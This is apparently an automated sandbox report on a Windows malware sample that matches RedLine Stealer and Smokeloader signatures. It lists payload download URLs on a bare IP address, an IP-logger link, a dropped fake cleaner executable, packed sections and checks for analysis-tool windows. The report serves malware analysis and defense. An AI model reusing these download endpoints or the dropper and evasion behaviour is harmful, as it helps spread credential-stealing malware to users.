Source: file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/download6
Source: file.exe, 00000000.00000003.2057643849.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082783354.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2032603186.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadA
Source: file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadF
Source: file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadM~r
Source: file.exe, 00000000.00000003.2057643849.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280659416.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2210244034.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2235376839.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2082783354.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2109447880.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2280585374.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2159672790.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2260450014.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134573830.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185003149.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/files/downloadh
Source: file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download
Source: file.exe, 00000000.00000003.2313365499.0000000005690000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/download6
Source: file.exe, 00000000.00000003.2330322141.0000000005690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.82.65.70/soft/downloadi~N
Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000003.2330322141.000000000565E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2327084794.000000000581C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330368931.0000000005601000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328880830.000000000581C000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000000.00000003.2330322141.000000000565E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2327084794.000000000581C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330368931.0000000005601000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328880830.000000000581C000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000000.00000003.2330322141.000000000565E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2327084794.000000000581C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2330368931.0000000005601000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2328880830.000000000581C000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Source: 00000000.00000002.2609959909.0000000000CEC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0FD000_3_04D0FD00
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0DF870_3_04D0DF87
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D197060_3_04D19706
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D031200_3_04D03120
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D022C00_3_04D022C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0E2C90_3_04D0E2C9
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D14AEE0_3_04D14AEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D0AA900_3_04D0AA90
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D152190_3_04D15219
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D043500_3_04D04350
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403D200_2_00403D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC00_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404F500_2_00404F50
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004109000_2_00410900
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A3060_2_0041A306
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EB870_2_0040EB87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415E190_2_00415E19
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EEC90_2_0040EEC9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156EE0_2_004156EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B6900_2_0040B690
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD1820_2_00AAD182
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD2090_2_00AAD209
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CF2D10_2_009CF2D1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA57C00_2_00AA57C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088E2AE0_2_0088E2AE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098A2AF0_2_0098A2AF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009994D10_2_009994D1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009852D20_2_009852D2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00891EC70_2_00891EC7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00986CC30_2_00986CC3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F3E070_2_008F3E07
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098D8390_2_0098D839
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098882B0_2_0098882B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00992A410_2_00992A41
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095E4680_2_0095E468
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0098F78E0_2_0098F78E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088A7C00_2_0088A7C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099B7EF0_2_0099B7EF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009377110_2_00937711
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E952E0_2_008E952E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009913560_2_00991356
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C675E0_2_008C675E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00996B710_2_00996B71
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099816F0_2_0099816F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B451B70_2_04B451B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4EDEE0_2_04B4EDEE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B43F870_2_04B43F87
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4B8F70_2_04B4B8F7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B451B70_2_04B451B7
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B4F1300_2_04B4F130
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B559550_2_04B55955
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B50B670_2_04B50B67
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04B4A9C7 appears 34 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 04D09B60 appears 34 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040A760 appears 35 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7020 -s 1704
Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: soft[1].0.drStatic PE information: No import functions for PE file found
Source: Y-Cleaner.exe.0.drStatic PE information: No import functions for PE file found
Source: soft[1].0.drStatic PE information: Data appended to the last section found
Source: Y-Cleaner.exe.0.drStatic PE information: Data appended to the last section found
Source: file.exe, 00000000.00000003.2343442368.00000000055C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs file.exe
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2609959909.0000000000CEC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CED0FE CreateToolhelp32Snapshot,Module32First,0_2_00CED0FE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401940 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,0_2_00401940
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7020
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7Jump to behavior
Source: C:\Users\user\Desktop\file.exeCommand line argument: emp0_2_00408770
Source: C:\Users\user\Desktop\file.exeCommand line argument: mixtwo0_2_00408770
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 44%
Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7020 -s 1704
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Y-Cleaner.exe
Source: file.exeStatic file information: File size 1948672 > 1048576
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: file.exeStatic PE information: Raw size of piktqyia is bigger than: 0x100000 < 0x1a9a00

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;piktqyia:EW;mvvqpdmt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x400e1
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x13f466
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x13f466
Source: file.exeStatic PE information: real checksum: 0x1e6a40 should be: 0x1e57b8
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: .idata
Source: file.exeStatic PE information: section name:
Source: file.exeStatic PE information: section name: piktqyia
Source: file.exeStatic PE information: section name: mvvqpdmt
Source: file.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D095F7 push ecx; ret 0_3_04D0960A
Source: C:\Users\user\Desktop\file.exeCode function: 0_3_04D2037D push esi; ret 0_3_04D20386
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A1F7 push ecx; ret 0_2_0040A20A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA0A1 push esi; ret 0_2_00AAA0B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA9CBF push ecx; ret 0_2_00AA9CCE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC8B6 push 52EA1BA9h; mov dword ptr [esp], ecx0_2_00AAD801
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC8B6 push ebx; mov dword ptr [esp], 0DFA4F95h0_2_00AAD80F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC8B6 push ecx; mov dword ptr [esp], 3C7E16FCh0_2_00AAD91F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC89E push 52EA1BA9h; mov dword ptr [esp], ecx0_2_00AAD801
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC89E push ebx; mov dword ptr [esp], 0DFA4F95h0_2_00AAD80F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC89E push ecx; mov dword ptr [esp], 3C7E16FCh0_2_00AAD91F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA9CEA push edi; ret 0_2_00AA9CF9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD4EB push ss; iretd 0_2_00AAD4FC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC8E7 push 52EA1BA9h; mov dword ptr [esp], ecx0_2_00AAD801
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC8E7 push ebx; mov dword ptr [esp], 0DFA4F95h0_2_00AAD80F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC8E7 push ecx; mov dword ptr [esp], 3C7E16FCh0_2_00AAD91F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC028 push edx; ret 0_2_00AAC037
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA9C0D push esi; ret 0_2_00AA9C1C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AACC13 push ebp; iretd 0_2_00AACC14
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA464 push ebp; ret 0_2_00AAA473
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAC059 push ebp; ret 0_2_00AAC068
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA9C5F push ecx; ret 0_2_00AA9C6E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAB852 push edx; mov dword ptr [esp], 4DDA119Ch0_2_00AAB87E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAB9A8 push eax; mov dword ptr [esp], 7CFF3257h0_2_00AABA0E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAB9A8 push eax; mov dword ptr [esp], 5EC920EAh0_2_00AABA54
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAA1AF push edx; ret 0_2_00AAA1BE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAD9AC push edi; mov dword ptr [esp], ecx0_2_00AADB27
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAB9B3 push eax; mov dword ptr [esp], 7CFF3257h0_2_00AABA0E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AAB9B3 push eax; mov dword ptr [esp], 5EC920EAh0_2_00AABA54
Source: file.exeStatic PE information: section name: piktqyia entropy: 7.942411405734934
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.914762304494209
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.914762304494209
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\svtJDfvf364R4G45effw53J7\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
